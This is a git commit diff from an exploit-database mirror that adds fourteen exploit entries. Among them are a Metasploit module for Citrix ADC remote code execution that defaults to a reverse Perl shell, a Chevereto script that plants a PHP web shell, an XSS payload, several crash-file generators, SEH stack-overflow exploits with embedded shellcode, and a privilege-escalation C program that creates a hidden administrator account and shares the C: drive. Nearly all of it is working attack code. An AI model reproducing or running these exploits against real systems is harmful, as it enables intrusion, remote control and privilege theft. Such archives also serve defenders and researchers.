DB: 2020-01-14
14 changes to exploits/shellcodes SpotDialup 1.6.7 - 'Name' Denial of Service (PoC) SpotOutlook 1.2.6 - 'Name' Denial of Service (PoC) Top Password Software Dialup Password Recovery 1.30 - Denial of Service (PoC) Backup Key Recovery 2.2.5 - 'Name' Denial of Service (PoC) TaskCanvas 1.4.0 - 'Registration' Denial Of Service Top Password Firefox Password Recovery 2.8 - Denial of Service (PoC) Advanced System Repair Pro 1.9.1.7 - Insecure File Permissions Allok Video Converter 4.6.1217 - Stack Overflow (SEH) Allok RM RMVB to AVI MPEG DVD Converter 3.6.1217 - Stack Overflow (SEH) Microsoft Windows 10 build 1809 - Local Privilege Escalation (UAC Bypass) Chevereto 3.13.4 Core - Remote Code Execution Citrix Application Delivery Controller and Gateway 10.5 - Remote Code Execution (Metasploit) Digi AnywhereUSB 14 - Reflective Cross-Site Scripting
This commit is contained in:
parent
d3ca859971
commit
83d2726c75
15 changed files with 701 additions and 1 deletions
194
exploits/multiple/webapps/47913.rb
Executable file
194
exploits/multiple/webapps/47913.rb
Executable file
|
@ -0,0 +1,194 @@
|
||||||
|
##
|
||||||
|
# This module requires Metasploit: https://metasploit.com/download
|
||||||
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
|
##
|
||||||
|
|
||||||
|
class MetasploitModule < Msf::Exploit::Remote
|
||||||
|
Rank = ExcellentRanking
|
||||||
|
|
||||||
|
include Msf::Exploit::Remote::HttpClient
|
||||||
|
|
||||||
|
def initialize(info = {})
|
||||||
|
super(update_info(info,
|
||||||
|
'Name' => 'Citrix ADC Remote Code Execution',
|
||||||
|
'Description' => %q(
|
||||||
|
An issue was discovered in Citrix Application Delivery Controller (ADC)
|
||||||
|
and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0. They allow Directory Traversal.
|
||||||
|
),
|
||||||
|
'Author' => [
|
||||||
|
'RAMELLA Sébastien' # https://www.pirates.re/
|
||||||
|
],
|
||||||
|
'References' => [
|
||||||
|
['CVE', '2019-19781'],
|
||||||
|
['URL', 'https://www.mdsec.co.uk/2020/01/deep-dive-to-citrix-adc-remote-code-execution-cve-2019-19781/'],
|
||||||
|
['EDB', '47901'],
|
||||||
|
['EDB', '47902']
|
||||||
|
],
|
||||||
|
'DisclosureDate' => '2019-12-17',
|
||||||
|
'License' => MSF_LICENSE,
|
||||||
|
'Platform' => ['unix'],
|
||||||
|
'Arch' => ARCH_CMD,
|
||||||
|
'Privileged' => true,
|
||||||
|
'Payload' => {
|
||||||
|
'Compat' => {
|
||||||
|
'PayloadType' => 'cmd',
|
||||||
|
'RequiredCmd' => 'generic perl meterpreter'
|
||||||
|
}
|
||||||
|
},
|
||||||
|
'Targets' => [
|
||||||
|
['Unix (remote shell)',
|
||||||
|
'Type' => :cmd_shell,
|
||||||
|
'DefaultOptions' => {
|
||||||
|
'PAYLOAD' => 'cmd/unix/reverse_perl',
|
||||||
|
'DisablePayloadHandler' => 'false'
|
||||||
|
}
|
||||||
|
],
|
||||||
|
['Unix (command-line)',
|
||||||
|
'Type' => :cmd_generic,
|
||||||
|
'DefaultOptions' => {
|
||||||
|
'PAYLOAD' => 'cmd/unix/generic',
|
||||||
|
'DisablePayloadHandler' => 'true'
|
||||||
|
}
|
||||||
|
],
|
||||||
|
],
|
||||||
|
'DefaultTarget' => 0,
|
||||||
|
'DefaultOptions' => {
|
||||||
|
'RPORT' => 443,
|
||||||
|
'SSL' => true
|
||||||
|
},
|
||||||
|
'Notes' => {
|
||||||
|
'Stability' => [CRASH_SAFE],
|
||||||
|
'Reliability' => [REPEATABLE_SESSION],
|
||||||
|
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
|
||||||
|
}
|
||||||
|
))
|
||||||
|
|
||||||
|
register_options([
|
||||||
|
OptAddress.new('RHOST', [true, 'The target address'])
|
||||||
|
])
|
||||||
|
|
||||||
|
register_advanced_options([
|
||||||
|
OptBool.new('ForceExploit', [false, 'Override check result', false])
|
||||||
|
])
|
||||||
|
|
||||||
|
deregister_options('RHOSTS')
|
||||||
|
end
|
||||||
|
|
||||||
|
def execute_command(command, opts = {})
|
||||||
|
filename = Rex::Text.rand_text_alpha(16)
|
||||||
|
nonce = Rex::Text.rand_text_alpha(6)
|
||||||
|
|
||||||
|
request = {
|
||||||
|
'method' => 'POST',
|
||||||
|
'uri' => normalize_uri('vpn', '..', 'vpns', 'portal', 'scripts', 'newbm.pl'),
|
||||||
|
'headers' => {
|
||||||
|
'NSC_USER' => '../../../netscaler/portal/templates/' + filename,
|
||||||
|
'NSC_NONCE' => nonce
|
||||||
|
},
|
||||||
|
'vars_post' => {
|
||||||
|
'url' => 'http://127.0.0.1',
|
||||||
|
'title' => "[% template.new({'BLOCK'='print readpipe(#{get_chr_payload(command)})'})%]",
|
||||||
|
'desc' => 'desc',
|
||||||
|
'UI_inuse' => 'RfWeb'
|
||||||
|
},
|
||||||
|
'encode_params' => false
|
||||||
|
}
|
||||||
|
|
||||||
|
begin
|
||||||
|
received = send_request_cgi(request)
|
||||||
|
rescue ::OpenSSL::SSL::SSLError, ::Errno::ENOTCONN
|
||||||
|
print_error('Unable to connect on the remote target.')
|
||||||
|
end
|
||||||
|
return false unless received
|
||||||
|
|
||||||
|
if received.code == 200
|
||||||
|
vprint_status("#{received.get_html_document.text}")
|
||||||
|
sleep 2
|
||||||
|
|
||||||
|
request = {
|
||||||
|
'method' => 'GET',
|
||||||
|
'uri' => normalize_uri('vpn', '..', 'vpns', 'portal', filename + '.xml'),
|
||||||
|
'headers' => {
|
||||||
|
'NSC_USER' => nonce,
|
||||||
|
'NSC_NONCE' => nonce
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
## Trigger to gain exploitation.
|
||||||
|
begin
|
||||||
|
send_request_cgi(request)
|
||||||
|
received = send_request_cgi(request)
|
||||||
|
rescue ::OpenSSL::SSL::SSLError, ::Errno::ENOTCONN
|
||||||
|
print_error('Unable to connect on the remote target.')
|
||||||
|
end
|
||||||
|
return false unless received
|
||||||
|
return received
|
||||||
|
end
|
||||||
|
|
||||||
|
return false
|
||||||
|
end
|
||||||
|
|
||||||
|
def get_chr_payload(command)
|
||||||
|
chr_payload = command
|
||||||
|
i = chr_payload.length
|
||||||
|
|
||||||
|
output = ""
|
||||||
|
chr_payload.each_char do | c |
|
||||||
|
i = i - 1
|
||||||
|
output << "chr(" << c.ord.to_s << ")"
|
||||||
|
if i != 0
|
||||||
|
output << " . "
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
return output
|
||||||
|
end
|
||||||
|
|
||||||
|
def check
|
||||||
|
begin
|
||||||
|
received = send_request_cgi(
|
||||||
|
"method" => "GET",
|
||||||
|
"uri" => normalize_uri('vpn', '..', 'vpns', 'cfg', 'smb.conf')
|
||||||
|
)
|
||||||
|
rescue ::OpenSSL::SSL::SSLError, ::Errno::ENOTCONN
|
||||||
|
print_error('Unable to connect on the remote target.')
|
||||||
|
end
|
||||||
|
|
||||||
|
if received && received.code != 200
|
||||||
|
return Exploit::CheckCode::Safe
|
||||||
|
end
|
||||||
|
return Exploit::CheckCode::Vulnerable
|
||||||
|
end
|
||||||
|
|
||||||
|
def exploit
|
||||||
|
unless check.eql? Exploit::CheckCode::Vulnerable
|
||||||
|
unless datastore['ForceExploit']
|
||||||
|
fail_with(Failure::NotVulnerable, 'The target is not exploitable.')
|
||||||
|
end
|
||||||
|
else
|
||||||
|
print_good('The target appears to be vulnerable.')
|
||||||
|
end
|
||||||
|
|
||||||
|
case target['Type']
|
||||||
|
when :cmd_generic
|
||||||
|
print_status("Sending #{datastore['PAYLOAD']} command payload")
|
||||||
|
vprint_status("Generated command payload: #{payload.encoded}")
|
||||||
|
|
||||||
|
received = execute_command(payload.encoded)
|
||||||
|
if (received) && (datastore['PAYLOAD'] == "cmd/unix/generic")
|
||||||
|
print_warning('Dumping command output in parsed http response')
|
||||||
|
print_good("#{received.get_html_document.text}")
|
||||||
|
else
|
||||||
|
print_warning('Empty response, no command output')
|
||||||
|
return
|
||||||
|
end
|
||||||
|
|
||||||
|
when :cmd_shell
|
||||||
|
print_status("Sending #{datastore['PAYLOAD']} command payload")
|
||||||
|
vprint_status("Generated command payload: #{payload.encoded}")
|
||||||
|
|
||||||
|
execute_command(payload.encoded)
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
end
|
60
exploits/php/webapps/47903.py
Executable file
60
exploits/php/webapps/47903.py
Executable file
|
@ -0,0 +1,60 @@
|
||||||
|
# Exploit Title: Chevereto 3.13.4 Core - Remote Code Execution
|
||||||
|
# Date: 2020-01-11
|
||||||
|
# Exploit Author: Jinny Ramsmark
|
||||||
|
# Vendor Homepage: https://chevereto.com/
|
||||||
|
# Software Link: https://github.com/Chevereto/Chevereto-Free/releases
|
||||||
|
# Version: 1.0.0 Free - 1.1.4 Free, <= 3.13.4 Core
|
||||||
|
# Tested on: Ubuntu 19.10, PHP 7.3, Apache/2.4.41
|
||||||
|
# CVE : N/A
|
||||||
|
|
||||||
|
from urllib import request, parse
|
||||||
|
from time import sleep
|
||||||
|
|
||||||
|
#Python3
|
||||||
|
#Needs to have a valid database server, database and user to exploit
|
||||||
|
#1.0.0 Free version confirmed vulnerable
|
||||||
|
#1.1.4 Free version confirmed vulnerable
|
||||||
|
#3.13.4 Core version confirmed vulnerable
|
||||||
|
|
||||||
|
def main():
|
||||||
|
|
||||||
|
target = 'http://cheveretoinstallation/'
|
||||||
|
cookie = 'PHPSESSID=89efba681a8bb81d32cd10d3170baf6e'
|
||||||
|
db_host = 'ip_to_valid_mysql'
|
||||||
|
db_name = 'valid_db'
|
||||||
|
db_user = 'valid_user'
|
||||||
|
db_pass = 'valid_pass'
|
||||||
|
db_table_prefix = 'chv_'
|
||||||
|
|
||||||
|
inject = "';if(strpos(file_get_contents('images/license.php'), '$_POST[\"ccc\"]') === false){file_put_contents('images/license.php','if(isset($_POST[\"ccc\"])){;system($_POST[\"ccc\"]);}');}//"
|
||||||
|
|
||||||
|
#Clean data for when we want to clean up the settings file
|
||||||
|
params = {'db_host': db_host, 'db_name': db_name, 'db_user': db_user, 'db_pass': db_pass, 'db_table_prefix': db_table_prefix}
|
||||||
|
data = parse.urlencode(params).encode()
|
||||||
|
|
||||||
|
#Settings data with injected code
|
||||||
|
params['db_table_prefix'] += inject
|
||||||
|
dataInject = parse.urlencode(params).encode()
|
||||||
|
|
||||||
|
#Do inject
|
||||||
|
doPostRequest(target + 'install', dataInject, cookie)
|
||||||
|
sleep(1)
|
||||||
|
|
||||||
|
#Request index page to run the injected code
|
||||||
|
doRequest(target)
|
||||||
|
|
||||||
|
sleep(1)
|
||||||
|
#Do a clean request to clean up the settings.php file
|
||||||
|
doPostRequest(target + 'install', data, cookie)
|
||||||
|
|
||||||
|
def doPostRequest(target, data, cookie):
|
||||||
|
req = request.Request(target, data=data)
|
||||||
|
req.add_header('Cookie', cookie)
|
||||||
|
resp = request.urlopen(req)
|
||||||
|
|
||||||
|
def doRequest(target):
|
||||||
|
req = request.Request(target)
|
||||||
|
resp = request.urlopen(req)
|
||||||
|
|
||||||
|
if __name__ == '__main__':
|
||||||
|
main()
|
20
exploits/php/webapps/47914.txt
Normal file
20
exploits/php/webapps/47914.txt
Normal file
|
@ -0,0 +1,20 @@
|
||||||
|
# Exploit Title: Digi AnywhereUSB 14 - Reflective Cross-Site Scripting
|
||||||
|
# Date: 2019-11-10
|
||||||
|
# Exploit Author: Raspina Net Pars Group
|
||||||
|
# Vendor Homepage: https://www.digi.com/products/networking/usb-connectivity/usb-over-ip/awusb
|
||||||
|
# Version: 1.93.21.19
|
||||||
|
# CVE : CVE-2019-18859
|
||||||
|
|
||||||
|
# PoC
|
||||||
|
|
||||||
|
GET //--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> HTTP/1.1
|
||||||
|
Host: Target
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
|
||||||
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||||
|
Accept-Language: en-US,en;q=0.5
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Connection: close
|
||||||
|
Upgrade-Insecure-Requests: 1
|
||||||
|
|
||||||
|
|
||||||
|
# Author Website: HTTPS://RNPG.info
|
33
exploits/windows/dos/47904.py
Executable file
33
exploits/windows/dos/47904.py
Executable file
|
@ -0,0 +1,33 @@
|
||||||
|
# Exploit Title: SpotDialup 1.6.7 - 'Name' Denial of Service (PoC)
|
||||||
|
# Exploit Author : Ismail Tasdelen
|
||||||
|
# Exploit Date: 2020-01-06
|
||||||
|
# Vendor Homepage : http://www.nsauditor.com/
|
||||||
|
# Link Software : http://www.nsauditor.com/downloads/spotdialup_setup.exe
|
||||||
|
# Tested on OS: Windows 10
|
||||||
|
# CVE : N/A
|
||||||
|
|
||||||
|
'''
|
||||||
|
Proof of Concept (PoC):
|
||||||
|
=======================
|
||||||
|
|
||||||
|
1.Download and install SpotDialup
|
||||||
|
2.Run the python operating script that will create a file (poc.txt)
|
||||||
|
3.Run the software "Register -> Enter Registration Code
|
||||||
|
4.Copy and paste the characters in the file (poc.txt)
|
||||||
|
5.Paste the characters in the field 'Name' and click on 'Ok'
|
||||||
|
6.SpotDialup Crashed
|
||||||
|
'''
|
||||||
|
|
||||||
|
#!/usr/bin/python
|
||||||
|
|
||||||
|
buffer = "A" * 1000
|
||||||
|
|
||||||
|
payload = buffer
|
||||||
|
try:
|
||||||
|
f=open("poc.txt","w")
|
||||||
|
print("[+] Creating %s bytes evil payload." %len(payload))
|
||||||
|
f.write(payload)
|
||||||
|
f.close()
|
||||||
|
print("[+] File created!")
|
||||||
|
except:
|
||||||
|
print("File cannot be created.")
|
33
exploits/windows/dos/47906.py
Executable file
33
exploits/windows/dos/47906.py
Executable file
|
@ -0,0 +1,33 @@
|
||||||
|
# Exploit Title: SpotOutlook 1.2.6 - 'Name' Denial of Service (PoC)
|
||||||
|
# Exploit Author: Ismail Tasdelen
|
||||||
|
# Exploit Date: 2020-01-06
|
||||||
|
# Vendor Homepage : http://www.nsauditor.com/
|
||||||
|
# Link Software : http://www.nsauditor.com/downloads/spotoutlook_setup.exe
|
||||||
|
# Tested on OS: Windows 10
|
||||||
|
# CVE : N/A
|
||||||
|
|
||||||
|
'''
|
||||||
|
Proof of Concept (PoC):
|
||||||
|
=======================
|
||||||
|
|
||||||
|
1.Download and install SpotOutlook
|
||||||
|
2.Run the python operating script that will create a file (poc.txt)
|
||||||
|
3.Run the software "Register -> Enter Registration Code
|
||||||
|
4.Copy and paste the characters in the file (poc.txt)
|
||||||
|
5.Paste the characters in the field 'Name' and click on 'Ok'
|
||||||
|
6.SpotOutlook Crashed
|
||||||
|
'''
|
||||||
|
|
||||||
|
#!/usr/bin/python
|
||||||
|
|
||||||
|
buffer = "A" * 1000
|
||||||
|
|
||||||
|
payload = buffer
|
||||||
|
try:
|
||||||
|
f=open("poc.txt","w")
|
||||||
|
print("[+] Creating %s bytes evil payload." %len(payload))
|
||||||
|
f.write(payload)
|
||||||
|
f.close()
|
||||||
|
print("[+] File created!")
|
||||||
|
except:
|
||||||
|
print("File cannot be created.")
|
17
exploits/windows/dos/47907.py
Executable file
17
exploits/windows/dos/47907.py
Executable file
|
@ -0,0 +1,17 @@
|
||||||
|
# Exploit Title: Top Password Software Dialup Password Recovery 1.30 - Denial of Service (PoC)
|
||||||
|
# Date: 2020-01-12
|
||||||
|
# Exploit Author: Antonio de la Piedra
|
||||||
|
# Vendor Homepage: https://www.top-password.com/
|
||||||
|
# Software Link: https://www.top-password.com/download/DialupPRSetup.exe
|
||||||
|
# Version: 1.30
|
||||||
|
# Tested on: Windows 7 SP1 32-bit
|
||||||
|
|
||||||
|
# Copy paste the contents of poc.txt into the
|
||||||
|
# User Name / Registration Code input fields.
|
||||||
|
|
||||||
|
#!/usr/bin/python
|
||||||
|
|
||||||
|
poc =3D "A"*5000
|
||||||
|
file =3D open("poc.txt","w")
|
||||||
|
file.write(poc)
|
||||||
|
file.close()
|
33
exploits/windows/dos/47909.py
Executable file
33
exploits/windows/dos/47909.py
Executable file
|
@ -0,0 +1,33 @@
|
||||||
|
# Exploit Title: Backup Key Recovery 2.2.5 - 'Name' Denial of Service (PoC)
|
||||||
|
# Exploit Author : Ismail Tasdelen
|
||||||
|
# Exploit Date: 2020-01-06
|
||||||
|
# Vendor Homepage : http://www.nsauditor.com/
|
||||||
|
# Link Software : http://www.nsauditor.com/downloads/backeyrecovery_setup.exe
|
||||||
|
# Tested on OS: Windows 10
|
||||||
|
# CVE : N/A
|
||||||
|
|
||||||
|
'''
|
||||||
|
Proof of Concept (PoC):
|
||||||
|
=======================
|
||||||
|
|
||||||
|
1.Download and install Backup Key Recovery
|
||||||
|
2.Run the python operating script that will create a file (poc.txt)
|
||||||
|
3.Run the software "Register -> Enter Registration Code
|
||||||
|
4.Copy and paste the characters in the file (poc.txt)
|
||||||
|
5.Paste the characters in the field 'Name' and click on 'Ok'
|
||||||
|
6.Backup Key Recovery Crashed
|
||||||
|
'''
|
||||||
|
|
||||||
|
#!/usr/bin/python
|
||||||
|
|
||||||
|
buffer = "A" * 1000
|
||||||
|
|
||||||
|
payload = buffer
|
||||||
|
try:
|
||||||
|
f=open("poc.txt","w")
|
||||||
|
print("[+] Creating %s bytes evil payload." %len(payload))
|
||||||
|
f.write(payload)
|
||||||
|
f.close()
|
||||||
|
print("[+] File created!")
|
||||||
|
except:
|
||||||
|
print("File cannot be created.")
|
33
exploits/windows/dos/47911.py
Executable file
33
exploits/windows/dos/47911.py
Executable file
|
@ -0,0 +1,33 @@
|
||||||
|
# Exploit Title: TaskCanvas 1.4.0 - 'Registration' Denial Of Service
|
||||||
|
# Exploit Author : Ismail Tasdelen
|
||||||
|
# Exploit Date: 2020-01-06
|
||||||
|
# Vendor Homepage : https://www.digitalvolcano.co.uk/
|
||||||
|
# Link Software : https://www.digitalvolcano.co.uk/taskcanvasdownload.html
|
||||||
|
# Tested on OS: Windows 10
|
||||||
|
# CVE : N/A
|
||||||
|
|
||||||
|
'''
|
||||||
|
Proof of Concept (PoC):
|
||||||
|
=======================
|
||||||
|
|
||||||
|
1.Download and install TaskCanvas
|
||||||
|
2.Run the python operating script that will create a file (poc.txt)
|
||||||
|
3.Run the software "Registration -> Enter Registration Code
|
||||||
|
4.Copy and paste the characters in the file (poc.txt)
|
||||||
|
5.Paste the characters in the field 'Registration' and click on 'Ok'
|
||||||
|
6.TaskCanvas Crashed
|
||||||
|
'''
|
||||||
|
|
||||||
|
#!/usr/bin/python
|
||||||
|
|
||||||
|
buffer = "A" * 1000
|
||||||
|
|
||||||
|
payload = buffer
|
||||||
|
try:
|
||||||
|
f=open("poc.txt","w")
|
||||||
|
print("[+] Creating %s bytes evil payload." %len(payload))
|
||||||
|
f.write(payload)
|
||||||
|
f.close()
|
||||||
|
print("[+] File created!")
|
||||||
|
except:
|
||||||
|
print("File cannot be created.")
|
17
exploits/windows/dos/47912.py
Executable file
17
exploits/windows/dos/47912.py
Executable file
|
@ -0,0 +1,17 @@
|
||||||
|
# Exploit Title: Top Password Firefox Password Recovery 2.8 - Denial of Service (PoC)
|
||||||
|
# Date: 2020-01-12
|
||||||
|
# Exploit Author: Antonio de la Piedra
|
||||||
|
# Vendor Homepage: https://www.top-password.com/
|
||||||
|
# Software Link: https://www.top-password.com/download/FirefoxPRSetup.exe
|
||||||
|
# Version: 2.8
|
||||||
|
# Tested on: Windows 7 SP1 32-bit
|
||||||
|
|
||||||
|
# Copy paste the contents of poc.txt into the
|
||||||
|
# User Name / Registration Code input fields.
|
||||||
|
|
||||||
|
#!/usr/bin/python
|
||||||
|
|
||||||
|
poc =3D "A"*5000
|
||||||
|
file =3D open("poc.txt","w")
|
||||||
|
file.write(poc)
|
||||||
|
file.close()
|
|
@ -5,7 +5,7 @@
|
||||||
# Version: 4.14.31
|
# Version: 4.14.31
|
||||||
# Fixed on: 5.3.35
|
# Fixed on: 5.3.35
|
||||||
# Tested on: Windows 10 x64
|
# Tested on: Windows 10 x64
|
||||||
# CVE : N/A
|
# CVE : CVE-2019-18194
|
||||||
|
|
||||||
# Vulnerability Description:
|
# Vulnerability Description:
|
||||||
# TotalAV 2020 4.14.31 has quarantine flaw that allows attacker escape of
|
# TotalAV 2020 4.14.31 has quarantine flaw that allows attacker escape of
|
||||||
|
|
47
exploits/windows/local/47905.txt
Normal file
47
exploits/windows/local/47905.txt
Normal file
|
@ -0,0 +1,47 @@
|
||||||
|
# Exploit Title: Advanced System Repair Pro 1.9.1.7 - Insecure File Permissions
|
||||||
|
# Exploit Author: ZwX
|
||||||
|
# Exploit Date: 2020-01-12
|
||||||
|
# Vendor Homepage : https://advancedsystemrepair.com/
|
||||||
|
# Software Link: http://advancedsystemrepair.com/ASRProInstaller.exe
|
||||||
|
# Tested on OS: Windows 10
|
||||||
|
|
||||||
|
|
||||||
|
# Proof of Concept (PoC):
|
||||||
|
==========================
|
||||||
|
|
||||||
|
C:\Program Files\Advanced System Repair Pro 1.9.1.7.0>icacls *.exe
|
||||||
|
AdvancedSystemRepairPro.exe Everyone:(F)
|
||||||
|
AUTORITE NT\Système:(I)(F)
|
||||||
|
BUILTIN\Administrateurs:(I)(F)
|
||||||
|
BUILTIN\Utilisateurs:(I)(RX)
|
||||||
|
|
||||||
|
dsutil.exe Everyone:(F)
|
||||||
|
AUTORITE NT\Système:(I)(F)
|
||||||
|
BUILTIN\Administrateurs:(I)(F)
|
||||||
|
BUILTIN\Utilisateurs:(I)(RX)
|
||||||
|
|
||||||
|
tscmon.exe Everyone:(F)
|
||||||
|
AUTORITE NT\Système:(I)(F)
|
||||||
|
BUILTIN\Administrateurs:(I)(F)
|
||||||
|
BUILTIN\Utilisateurs:(I)(RX)
|
||||||
|
|
||||||
|
|
||||||
|
#Exploit code(s):
|
||||||
|
=================
|
||||||
|
|
||||||
|
1) Compile below 'C' code name it as "AdvancedSystemRepairPro.exe"
|
||||||
|
|
||||||
|
#include<windows.h>
|
||||||
|
|
||||||
|
int main(void){
|
||||||
|
system("net user hacker abc123 /add");
|
||||||
|
system("net localgroup Administrators hacker /add");
|
||||||
|
system("net share SHARE_NAME=c:\ /grant:hacker,full");
|
||||||
|
WinExec("C:\\Program Files\\Advanced System Repair Pro 1.9.1.7.0\\~AdvancedSystemRepairPro.exe",0);
|
||||||
|
return 0;
|
||||||
|
}
|
||||||
|
|
||||||
|
2) Rename original "AdvancedSystemRepairPro.exe" to "~AdvancedSystemRepairPro.exe"
|
||||||
|
3) Place our malicious "AdvancedSystemRepairPro.exe" in the Advanced System Repair Pro 1.9.1.7.0 directory
|
||||||
|
4) Disconnect and wait for a more privileged user to connect and use AdvancedSystemRepairPro IDE.
|
||||||
|
Privilege Successful Escalation
|
51
exploits/windows/local/47908.py
Executable file
51
exploits/windows/local/47908.py
Executable file
|
@ -0,0 +1,51 @@
|
||||||
|
# Exploit Title: Allok Video Converter 4.6.1217 - Stack Overflow (SEH)
|
||||||
|
# Date: 2020-01-12
|
||||||
|
# Exploit Author: Antonio de la Piedra
|
||||||
|
# Vendor Homepage: https://www.alloksoft.com
|
||||||
|
# Software Link: https://www.alloksoft.com/allok_vconverter.exe
|
||||||
|
# Version: 4.6.1217
|
||||||
|
# Tested on: Windows 7 SP1 32-bit
|
||||||
|
|
||||||
|
# Copy paste the contents of poc.txt into the License Name input field
|
||||||
|
# of Allok Video Converter 4.6.1217 to execute calc.exe.
|
||||||
|
|
||||||
|
nseh_offset = 780
|
||||||
|
total = 1000
|
||||||
|
|
||||||
|
# msfvenom -p windows/exec -b '\x00\x0a\x0d' -f python --var-name shellcode=
|
||||||
|
_calc CMD=calc.exe EXITFUNC=thread
|
||||||
|
shellcode_calc = b""
|
||||||
|
shellcode_calc += b"\xdd\xc0\xbe\x48\x33\xfd\x23\xd9\x74\x24"
|
||||||
|
shellcode_calc += b"\xf4\x5f\x33\xc9\xb1\x31\x83\xef\xfc\x31"
|
||||||
|
shellcode_calc += b"\x77\x14\x03\x77\x5c\xd1\x08\xdf\xb4\x97"
|
||||||
|
shellcode_calc += b"\xf3\x20\x44\xf8\x7a\xc5\x75\x38\x18\x8d"
|
||||||
|
shellcode_calc += b"\x25\x88\x6a\xc3\xc9\x63\x3e\xf0\x5a\x01"
|
||||||
|
shellcode_calc += b"\x97\xf7\xeb\xac\xc1\x36\xec\x9d\x32\x58"
|
||||||
|
shellcode_calc += b"\x6e\xdc\x66\xba\x4f\x2f\x7b\xbb\x88\x52"
|
||||||
|
shellcode_calc += b"\x76\xe9\x41\x18\x25\x1e\xe6\x54\xf6\x95"
|
||||||
|
shellcode_calc += b"\xb4\x79\x7e\x49\x0c\x7b\xaf\xdc\x07\x22"
|
||||||
|
shellcode_calc += b"\x6f\xde\xc4\x5e\x26\xf8\x09\x5a\xf0\x73"
|
||||||
|
shellcode_calc += b"\xf9\x10\x03\x52\x30\xd8\xa8\x9b\xfd\x2b"
|
||||||
|
shellcode_calc += b"\xb0\xdc\x39\xd4\xc7\x14\x3a\x69\xd0\xe2"
|
||||||
|
shellcode_calc += b"\x41\xb5\x55\xf1\xe1\x3e\xcd\xdd\x10\x92"
|
||||||
|
shellcode_calc += b"\x88\x96\x1e\x5f\xde\xf1\x02\x5e\x33\x8a"
|
||||||
|
shellcode_calc += b"\x3e\xeb\xb2\x5d\xb7\xaf\x90\x79\x9c\x74"
|
||||||
|
shellcode_calc += b"\xb8\xd8\x78\xda\xc5\x3b\x23\x83\x63\x37"
|
||||||
|
shellcode_calc += b"\xc9\xd0\x19\x1a\x87\x27\xaf\x20\xe5\x28"
|
||||||
|
shellcode_calc += b"\xaf\x2a\x59\x41\x9e\xa1\x36\x16\x1f\x60"
|
||||||
|
shellcode_calc += b"\x73\xf8\xfd\xa1\x89\x91\x5b\x20\x30\xfc"
|
||||||
|
shellcode_calc += b"\x5b\x9e\x76\xf9\xdf\x2b\x06\xfe\xc0\x59"
|
||||||
|
shellcode_calc += b"\x03\xba\x46\xb1\x79\xd3\x22\xb5\x2e\xd4"
|
||||||
|
shellcode_calc += b"\x66\xd6\xb1\x46\xea\x37\x54\xef\x89\x47"
|
||||||
|
|
||||||
|
poc = ""
|
||||||
|
poc += "A"*nseh_offset
|
||||||
|
poc += "\xEB\x0b\x90\x90" # jmp forward (nseh)
|
||||||
|
poc += "\x59\x78\x03\x10" # pop pop ret (seh)
|
||||||
|
poc += "\x90"*20
|
||||||
|
poc += shellcode_calc
|
||||||
|
poc += "D"*(total - len(poc))
|
||||||
|
|
||||||
|
file = open("poc_seh.txt","w")
|
||||||
|
file.write(poc)
|
||||||
|
file.close()
|
52
exploits/windows/local/47910.py
Executable file
52
exploits/windows/local/47910.py
Executable file
|
@ -0,0 +1,52 @@
|
||||||
|
# Exploit Title: Allok RM RMVB to AVI MPEG DVD Converter 3.6.1217 - Stack Overflow (SEH)
|
||||||
|
# Date: 2020-01-12
|
||||||
|
# Exploit Author: Antonio de la Piedra
|
||||||
|
# Vendor Homepage: https://www.alloksoft.com
|
||||||
|
# Software Link: https://www.alloksoft.com/allok_rmconverter.exe
|
||||||
|
# Version: 3.6.1217
|
||||||
|
# Tested on: Windows 7 SP1 32-bit
|
||||||
|
|
||||||
|
# Copy paste the contents of poc_seh.txt into the License Name input field
|
||||||
|
# of Allok RM RMVB to AVI MPEG DVD Converter 3.6.1217 to execute calc.exe.
|
||||||
|
|
||||||
|
#!/usr/bin/python
|
||||||
|
|
||||||
|
nseh_offset = 780
|
||||||
|
total = 1000
|
||||||
|
|
||||||
|
# msfvenom -p windows/exec -b '\x00\x0a\x0d' -f python --var-name shellcode_calc CMD=calc.exe EXITFUNC=thread
|
||||||
|
shellcode_calc = b""
|
||||||
|
shellcode_calc += b"\xdd\xc0\xbe\x48\x33\xfd\x23\xd9\x74\x24"
|
||||||
|
shellcode_calc += b"\xf4\x5f\x33\xc9\xb1\x31\x83\xef\xfc\x31"
|
||||||
|
shellcode_calc += b"\x77\x14\x03\x77\x5c\xd1\x08\xdf\xb4\x97"
|
||||||
|
shellcode_calc += b"\xf3\x20\x44\xf8\x7a\xc5\x75\x38\x18\x8d"
|
||||||
|
shellcode_calc += b"\x25\x88\x6a\xc3\xc9\x63\x3e\xf0\x5a\x01"
|
||||||
|
shellcode_calc += b"\x97\xf7\xeb\xac\xc1\x36\xec\x9d\x32\x58"
|
||||||
|
shellcode_calc += b"\x6e\xdc\x66\xba\x4f\x2f\x7b\xbb\x88\x52"
|
||||||
|
shellcode_calc += b"\x76\xe9\x41\x18\x25\x1e\xe6\x54\xf6\x95"
|
||||||
|
shellcode_calc += b"\xb4\x79\x7e\x49\x0c\x7b\xaf\xdc\x07\x22"
|
||||||
|
shellcode_calc += b"\x6f\xde\xc4\x5e\x26\xf8\x09\x5a\xf0\x73"
|
||||||
|
shellcode_calc += b"\xf9\x10\x03\x52\x30\xd8\xa8\x9b\xfd\x2b"
|
||||||
|
shellcode_calc += b"\xb0\xdc\x39\xd4\xc7\x14\x3a\x69\xd0\xe2"
|
||||||
|
shellcode_calc += b"\x41\xb5\x55\xf1\xe1\x3e\xcd\xdd\x10\x92"
|
||||||
|
shellcode_calc += b"\x88\x96\x1e\x5f\xde\xf1\x02\x5e\x33\x8a"
|
||||||
|
shellcode_calc += b"\x3e\xeb\xb2\x5d\xb7\xaf\x90\x79\x9c\x74"
|
||||||
|
shellcode_calc += b"\xb8\xd8\x78\xda\xc5\x3b\x23\x83\x63\x37"
|
||||||
|
shellcode_calc += b"\xc9\xd0\x19\x1a\x87\x27\xaf\x20\xe5\x28"
|
||||||
